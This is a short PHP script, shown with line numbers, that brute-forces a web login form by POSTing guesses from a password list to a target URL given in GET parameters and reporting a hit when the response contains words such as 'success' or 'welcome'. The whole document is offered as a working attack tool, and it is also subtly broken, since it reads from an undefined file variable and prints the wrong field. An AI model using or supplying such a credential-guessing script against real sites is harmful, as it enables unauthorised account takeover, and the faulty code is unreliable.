<?php$file = $_GET['file'];$fh = fopen($myFile, 'r');$theData = fread($fh)

1. <?php
2. $file = $_GET['file'];
3. $fh = fopen($myFile, 'r');
4. $theData = fread($fh);
5. fclose($fh);
6. $passwords = explode(",",$file);
7. $numberofpass = count($passwords);
8. $counter = 0;
9. $target = $_GET['target'];
10. $passwordfield = $_GET['pfield'];
11. $usernamefield = $_GET['ufield'];
12. $usernametarget = $_GET['utarget'];
13. while($counter < $numberofpass){
14. $data = array();
15. $data[$usernamefield] = $usernametarget;
16. $data[$passwordfield] = $passwords[$counter];
17. $post_str = '';
18. foreach($data as $key=>$val) {
19.     $post_str .= $key.'='.urlencode($val).'&';
20. }
21. $post_str = substr($post_str, 0, -1);
22. $ch = curl_init();
23.  
24. curl_setopt($ch, CURLOPT_URL, $target );
25. curl_setopt($ch, CURLOPT_POST, TRUE);
26. curl_setopt($ch, CURLOPT_POSTFIELDS, $post_str);
27. curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
28. $response = curl_exec($ch );
29.  
30. curl_close($ch );
31.  
32. if(strpos($response,"logged") > 0){
33. echo "Password found:" . $data['password'] . "<br>";
34. die();
35. }
36. if(strpos($response,$usernametarget) > 0){
37. echo "Password found:" . $data['password'] . "<br>";
38. die();
39. }
40. if(strpos($response,"success") > 0){
41. echo "Password found:" . $data['password'] . "<br>";
42. die();
43. }
44. if(strpos($response,"welcome") > 0){
45. echo "Password found:" . $data['password'] . "<br>";
46. die();
47. }
48. if(strpos($response,"thanks") > 0){
49. echo "Password found:" . $data['password'] . "<br>";
50. die();
51. }
52. $counter = $counter + 1;
53. }
54. ?>